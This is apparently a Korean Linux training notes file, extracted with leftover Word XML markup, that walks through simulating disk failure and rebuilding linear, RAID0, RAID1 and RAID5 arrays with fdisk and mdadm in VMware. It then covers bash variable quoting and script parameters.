cp /boot/vmlinuz-4.4.0-21-generic /raidLinear/testFile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root@server:~# cp /boot/vmlinuz-4.4.0-21-generic /raid0/testFile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root@server:~# cp /boot/vmlinuz-4.4.0-21-generic /raid1/testFile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root@server:~# cp /boot/vmlinuz-4.4.0-21-generic /raid5/testFile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root@server:~# df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Filesystem     1K-blocks    Used Available Use% Mounted on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udev              479660       0    479660   0% /dev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tmpfs              99848    6396     93452   7% /run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/dev/sda2       78499768 4402072  70087048   6% /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tmpfs             499232      12    499220   1% /dev/shm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tmpfs               5120       0      5120   0% /run/lock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tmpfs             499232       0    499232   0% /sys/fs/cgroup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/dev/md0         2027408    9924   1896448   1% /raid0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/dev/md1         1014104    8136    937236   1% /raid1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/dev/md5         2027408    9924   1896448   1% /raid5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/dev/md9         3026704   11460   2841780   1% /raidLinear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tmpfs              99848      36     99812   1% /run/user/0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/dev/sr0         1451056 1451056         0 100% /media/root/Ubuntu 16.04 LTS amd64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*** vmware setting 에서 scsi0:2, scsi0:4, scsi0:6, scsi0:9 디스크를 제거(remove) 후 부팅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*** vmware 하단에 HDD 아이콘의 개수가 준 것을 확인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*** 정상적으로 부팅되지 않고, 응급 모두로 접속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7375650" cy="5537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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7375650" cy="5537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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7375650" cy="5537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375650" cy="5537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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7375650" cy="55372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*** 파손된 디스크 자리에 새로운 디스크를 추가 후 리부팅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*** 추가한 디스크를 파티셔닝 작업</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4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ls -l /dev/sd*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brw-rw---- 1 root disk 8,   0  5월 30 01:15 /dev/sda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brw-rw---- 1 root disk 8,   1  5월 30 01:15 /dev/sda1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brw-rw---- 1 root disk 8,   2  5월 30 01:15 /dev/sda2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brw-rw---- 1 root disk 8,  16  5월 30 01:15 /dev/sdb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brw-rw---- 1 root disk 8,  17  5월 30 01:15 /dev/sdb1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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 32  5월 30 01:15 /dev/sdc ⇐ 새로 추가한 디스크로 파티션이 나눠져있지 않은 상태이다.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brw-rw---- 1 root disk 8,  48  5월 30 01:15 /dev/sdd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brw-rw---- 1 root disk 8,  49  5월 30 01:15 /dev/sdd1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A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 64  5월 30 01:15 /dev/sde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brw-rw---- 1 root disk 8,  80  5월 30 01:15 /dev/sdf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brw-rw---- 1 root disk 8,  81  5월 30 01:15 /dev/sdf1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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 96  5월 30 01:15 /dev/sdg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brw-rw---- 1 root disk 8, 112  5월 30 01:15 /dev/sdh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brw-rw---- 1 root disk 8, 113  5월 30 01:15 /dev/sdh1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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128  5월 30 01:15 /dev/sdi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brw-rw---- 1 root disk 8, 144  5월 30 01:15 /dev/sdj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brw-rw---- 1 root disk 8, 145  5월 30 01:15 /dev/sdj1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fdisk /dev/sdc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Welcome to fdisk (util-linux 2.27.1).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Changes will remain in memory only, until you decide to write them.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Be careful before using the write command.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Device does not contain a recognized partition table.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Created a new DOS disklabel with disk identifier 0xa052e1b2.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Command (m for help): n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Partition type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p   primary (0 primary, 0 extended, 4 free)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e   extended (container for logical partitions)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Select (default p): p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Using default response p.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Partition number (1-4, default 1): 1 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First sector (2048-2097151, default 2048): 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Last sector, +sectors or +size{K,M,G,T,P} (2048-2097151, default 2097151): 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Created a new partition 1 of type 'Linux' and of size 1023 MiB.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Command (m for help): t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Selected partition 1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Partition type (type L to list all types): fd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Changed type of partition 'Linux' to 'Linux raid autodetect'.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Command (m for help): w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The partition table has been altered.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Calling ioctl() to re-read partition table.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Syncing disks.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fdisk /dev/sde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Welcome to fdisk (util-linux 2.27.1).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Changes will remain in memory only, until you decide to write them.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Be careful before using the write command.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Device does not contain a recognized partition table.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Created a new DOS disklabel with disk identifier 0xadbe24d2.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Command (m for help): n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Partition type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p   primary (0 primary, 0 extended, 4 free)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e   extended (container for logical partitions)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Select (default p): p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Using default response p.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Partition number (1-4, default 1): 1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First sector (2048-2097151, default 2048): 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Last sector, +sectors or +size{K,M,G,T,P} (2048-2097151, default 2097151): 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Created a new partition 1 of type 'Linux' and of size 1023 MiB.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Command (m for help): t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Selected partition 1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Partition type (type L to list all types): fd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Changed type of partition 'Linux' to 'Linux raid autodetect'.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Command (m for help): w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The partition table has been altered.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Calling ioctl() to re-read partition table.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Syncing disks.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fdisk /dev/sdg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Welcome to fdisk (util-linux 2.27.1).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Changes will remain in memory only, until you decide to write them.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Be careful before using the write command.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Device does not contain a recognized partition table.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Created a new DOS disklabel with disk identifier 0x5128489d.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Command (m for help): n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Partition type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p   primary (0 primary, 0 extended, 4 free)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e   extended (container for logical partitions)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Select (default p): p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Partition number (1-4, default 1): 1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First sector (2048-2097151, default 2048): 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Last sector, +sectors or +size{K,M,G,T,P} (2048-2097151, default 2097151): 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Created a new partition 1 of type 'Linux' and of size 1023 MiB.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Command (m for help): t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Selected partition 1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Partition type (type L to list all types): fd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Changed type of partition 'Linux' to 'Linux raid autodetect'.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Command (m for help): w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The partition table has been altered.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Calling ioctl() to re-read partition table.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Syncing disks.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fdisk /dev/sdi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Welcome to fdisk (util-linux 2.27.1).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Changes will remain in memory only, until you decide to write them.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Be careful before using the write command.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Device does not contain a recognized partition table.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Created a new DOS disklabel with disk identifier 0x85c43010.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Command (m for help): n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Partition type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p   primary (0 primary, 0 extended, 4 free)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e   extended (container for logical partitions)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Select (default p): p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Partition number (1-4, default 1): 1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First sector (2048-2097151, default 2048): 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Last sector, +sectors or +size{K,M,G,T,P} (2048-2097151, default 2097151): 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Created a new partition 1 of type 'Linux' and of size 1023 MiB.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Command (m for help): t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Selected partition 1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Partition type (type L to list all types): fd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Changed type of partition 'Linux' to 'Linux raid autodetect'.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Command (m for help): w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The partition table has been altered.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Calling ioctl() to re-read partition table.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Syncing disks.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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls -l /dev/sd*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brw-rw---- 1 root disk 8,   0  5월 30 01:15 /dev/sda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brw-rw---- 1 root disk 8,   1  5월 30 01:15 /dev/sda1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brw-rw---- 1 root disk 8,   2  5월 30 01:15 /dev/sda2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brw-rw---- 1 root disk 8,  16  5월 30 01:15 /dev/sdb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brw-rw---- 1 root disk 8,  17  5월 30 01:15 /dev/sdb1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brw-rw---- 1 root disk 8,  32  5월 30 01:19 /dev/sdc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033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 33  5월 30 01:19 /dev/sdc1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brw-rw---- 1 root disk 8,  48  5월 30 01:15 /dev/sdd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brw-rw---- 1 root disk 8,  49  5월 30 01:15 /dev/sdd1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brw-rw---- 1 root disk 8,  64  5월 30 01:19 /dev/sde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033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 65  5월 30 01:19 /dev/sde1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brw-rw---- 1 root disk 8,  80  5월 30 01:15 /dev/sdf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brw-rw---- 1 root disk 8,  81  5월 30 01:15 /dev/sdf1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brw-rw---- 1 root disk 8,  96  5월 30 01:20 /dev/sdg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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 97  5월 30 01:20 /dev/sdg1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brw-rw---- 1 root disk 8, 112  5월 30 01:15 /dev/sdh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brw-rw---- 1 root disk 8, 113  5월 30 01:15 /dev/sdh1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brw-rw---- 1 root disk 8, 128  5월 30 01:20 /dev/sdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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brw-rw---- 1 root disk 8, 129  5월 30 01:20 /dev/sdi1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brw-rw---- 1 root disk 8, 144  5월 30 01:15 /dev/sdj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brw-rw---- 1 root disk 8, 145  5월 30 01:15 /dev/sdj1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*** Linear RAID와 RAID 0는 중지 후 재구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034D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--stop /dev/md9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mdadm: stopped /dev/md9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034F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--create /dev/md9 --level=linear --raid-devices=2 /dev/sdb1 /dev/sdc1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mdadm: /dev/sdb1 appears to be part of a raid array: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   level=linear devices=2 ctime=Wed May 29 22:58:43 2019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Continue creating array? yes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mdadm: Defaulting to version 1.2 metadata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mdadm: array /dev/md9 started.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root@server:~# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000356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--stop /dev/md0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mdadm: stopped /dev/md0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000358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--create /dev/md0 --level=0 --raid-devices=2 /dev/sdd1 /dev/sde1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mdadm: /dev/sdd1 appears to be part of a raid array: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 level=raid0 devices=2 ctime=Wed May 29 23:56:57 2019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Continue creating array? yes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mdadm: Defaulting to version 1.2 metadata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mdadm: array /dev/md0 started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035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/dev/md9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/dev/md9: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  Version : 1.2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Creation Time : Thu May 30 01:26:02 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000362">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raid Level : linear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Array Size : 3141632 (3.00 GiB 3.22 GB)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Raid Devices : 2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Total Devices : 2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Persistence : Superblock is persistent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Update Time : Thu May 30 01:26:02 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000369">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> State : clean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Active Devices : 2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Working Devices : 2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Failed Devices : 0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Spare Devices : 0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Rounding : 0K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   Name : server:9  (local to host server)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UUID : b277ab60:569997b3:f83eee17:4bdf659b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       Events : 0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Number   Major   Minor   RaidDevice State</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000376">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   0       8       17        0      active sync   /dev/sdb1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037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1       8       33        1      active sync   /dev/sdc1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000378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/dev/md0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/dev/md0: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    Version : 1.2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Creation Time : Thu May 30 01:27:02 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raid Level : raid0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Array Size : 2093056 (2044.34 MiB 2143.29 MB)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Raid Devices : 2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Total Devices : 2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Persistence : Superblock is persistent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Update Time : Thu May 30 01:27:02 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">State : clean 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Active Devices : 2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Working Devices : 2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Failed Devices : 0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Spare Devices : 0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Chunk Size : 512K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       Name : server:0  (local to host server)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       UUID : e15c02e0:ad399e2f:f02dea24:e24faf99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     Events : 0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Number   Major   Minor   RaidDevice State</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000390">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0       8       49        0      active sync   /dev/sdd1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039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1       8       65        1      active sync   /dev/sde1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root@server:~# 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*** RAID1, RADI5에 새로운 디스크를 추가</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039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/dev/md1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/dev/md1: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Version : 1.2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Creation Time : Thu May 30 00:01:02 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000399">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raid Level : raid1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Array Size : 1046976 (1022.61 MiB 1072.10 MB)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Used Dev Size : 1046976 (1022.61 MiB 1072.10 MB)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Raid Devices : 2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Total Devices : 1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Persistence : Superblock is persistent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Update Time : Thu May 30 01:20:17 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">State : clean, degraded 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Active Devices : 1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Working Devices : 1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Failed Devices : 0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Spare Devices : 0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Name : server:1  (local to host server)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   UUID : 53fcbd76:1ae32226:e2d2842d:40800aa3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Events : 45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Number   Major   Minor   RaidDevice State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 0       8       81        0      active sync   /dev/sdf1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2       0        0        2      removed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root@server:~# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AF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/dev/md1 --add /dev/sdg1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mdadm: added /dev/sdg1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B1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/dev/md1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/dev/md1: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Version : 1.2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Creation Time : Thu May 30 00:01:02 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raid Level : raid1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Array Size : 1046976 (1022.61 MiB 1072.10 MB)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Used Dev Size : 1046976 (1022.61 MiB 1072.10 MB)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Raid Devices : 2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Total Devices : 2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Persistence : Superblock is persistent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Update Time : Thu May 30 01:31:06 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">State : clean 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Active Devices : 2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Working Devices : 2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Failed Devices : 0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Spare Devices : 0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       Name : server:1  (local to host server)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   UUID : 53fcbd76:1ae32226:e2d2842d:40800aa3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  Events : 64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Number   Major   Minor   RaidDevice State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 0       8       81        0      active sync   /dev/sdf1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2       8       97        1      active sync   /dev/sdg1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root@server:~# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CB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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mdadm --detail /dev/md5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/dev/md5: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    Version : 1.2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Creation Time : Thu May 30 00:05:36 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raid Level : raid5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Array Size : 2093056 (2044.34 MiB 2143.29 MB)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Used Dev Size : 1046528 (1022.17 MiB 1071.64 MB)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Raid Devices : 3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Total Devices : 2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Persistence : Superblock is persistent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Update Time : Thu May 30 01:15:19 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> State : clean, degraded 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Active Devices : 2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Working Devices : 2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Failed Devices : 0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Spare Devices : 0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Layout : left-symmetric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Chunk Size : 512K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Name : server:5  (local to host server)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   UUID : 8d696d8f:187ca2ab:edfa7224:d39a2957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 Events : 30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Number   Major   Minor   RaidDevice State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0       8      113        0      active sync   /dev/sdh1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2       0        0        2      removed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3       8      145        2      active sync   /dev/sdj1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E8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/dev/md5 --add /dev/sdi1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mdadm: added /dev/sdi1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EA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/dev/md5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/dev/md5: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Version : 1.2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Creation Time : Thu May 30 00:05:36 2019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Raid Level : raid5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Array Size : 2093056 (2044.34 MiB 2143.29 MB)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Used Dev Size : 1046528 (1022.17 MiB 1071.64 MB)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Raid Devices : 3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Total Devices : 3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Persistence : Superblock is persistent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Update Time : Thu May 30 01:32:12 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">State : clean, degraded, recovering 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Active Devices : 2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Working Devices : 3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Failed Devices : 0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Spare Devices : 1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 Layout : left-symmetric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Chunk Size : 512K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Rebuild Status : 42% complete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     Name : server:5  (local to host server)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     UUID : 8d696d8f:187ca2ab:edfa7224:d39a2957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 Events : 38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Number   Major   Minor   RaidDevice State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0       8      113        0      active sync   /dev/sdh1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000407">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4       8      129        1      spare rebuilding   /dev/sdi1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3       8      145        2      active sync   /dev/sdj1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000409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root@server:~# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mdadm --detail /dev/md5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/dev/md5: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    Version : 1.2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Creation Time : Thu May 30 00:05:36 2019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 Raid Level : raid5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 Array Size : 2093056 (2044.34 MiB 2143.29 MB)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Used Dev Size : 1046528 (1022.17 MiB 1071.64 MB)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Raid Devices : 3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Total Devices : 3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Persistence : Superblock is persistent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Update Time : Thu May 30 01:32:16 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000415">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">State : clean 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Active Devices : 3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Working Devices : 3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Failed Devices : 0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Spare Devices : 0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   Layout : left-symmetric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 Chunk Size : 512K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   Name : server:5  (local to host server)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   UUID : 8d696d8f:187ca2ab:edfa7224:d39a2957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  Events : 49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Number   Major   Minor   RaidDevice State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0       8      113        0      active sync   /dev/sdh1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000424">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000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ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4       8      129        1      active sync   /dev/sdi1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3       8      145        2      active sync   /dev/sdj1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*** /etc/fstab 내용과 /etc/mdadm/mdadm.conf 파일 내용을 수정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*** update-initramfs -u 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*** reboot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root@server:~# myval="Hi Woo" </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ "Hi Woo" 값을 가지는 myval 변수를 선언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root@server:~# echo $myval </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ myval 변수값을 출력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Hi Woo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root@server:~# echo "$myval"</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ myval 변수값을 출력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Hi Woo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root@server:~# echo '$myval'</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ 변수값을 가져오는 $ 기호를 이스케이프시켜 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$myval</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   단순 문자열로 출력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root@server:~# echo \$myval</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ 상동 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$myval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root@server:~# read myval</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ 입력받은 값을 myval 변수에 할당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abcd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root@server:~# echo $myval</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">⇐ 입력받은 abcd를 출력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abcd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root@server:~# echo '$myval = ' $myval</w:t>
        <w:tab/>
        <w:t xml:space="preserve">⇐ '$myval = ' → $ 기호가 이스케이프 됨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$myval =  abcd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root@server:~# echo \$myval = $myval</w:t>
        <w:tab/>
        <w:t xml:space="preserve">⇐ 상동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$myval = abcd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root@server:~# echo "'$myval' = $myval"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">⇐ "'$myval' … → $ 기호를 이스케이프 시키는 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'abcd' = abcd</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   홑따움표가 이스케이프 됨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root@server:~# sh test.sh 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실행파일 이름은 &lt;test.sh&gt; 입니다.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첫번째 파라미터는 &lt;&gt; 이고, 두번째 파라미터는 &lt;&gt; 입니다.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전체 파라미터는 &lt;&gt; 입니다.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root@server:~# sh test.sh p1 p2 p3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실행파일 이름은 &lt;test.sh&gt; 입니다.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첫번째 파라미터는 &lt;p1&gt; 이고, 두번째 파라미터는 &lt;p2&gt; 입니다.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전체 파라미터는 &lt;p1 p2 p3&gt; 입니다.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root@server:~# chmod +x test.sh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root@server:~# ./test.sh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실행파일 이름은 &lt;./test.sh&gt; 입니다.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첫번째 파라미터는 &lt;&gt; 이고, 두번째 파라미터는 &lt;&gt; 입니다.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전체 파라미터는 &lt;&gt; 입니다.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root@server:~# ./test.sh p1 p2 p3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실행파일 이름은 &lt;./test.sh&gt; 입니다.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첫번째 파라미터는 &lt;p1&gt; 이고, 두번째 파라미터는 &lt;p2&gt; 입니다.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전체 파라미터는 &lt;p1 p2 p3&gt; 입니다.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파일경로를 입력 받아서 해당 파일의 앞부분(3줄)을 출력해 주는 쉘 프로그램을 만들어 보세요.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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쉘 프로그램 파일명 : printHead.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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실행 형식 : # ./printHead.sh 파일경로</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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파일경로를 입력하지 않은 경우에는 "파일경로를 입력하세요"라는 오류 메시지를 출력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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파일경로에 파일이 존재하지 않으면 "존재하지 않는 파일입니다."라는 오류 메시지를 출력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 -z $* ] </w:t>
            </w:r>
          </w:p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echo '파일경로를 입력하세요.'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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exit 1</w:t>
            </w:r>
          </w:p>
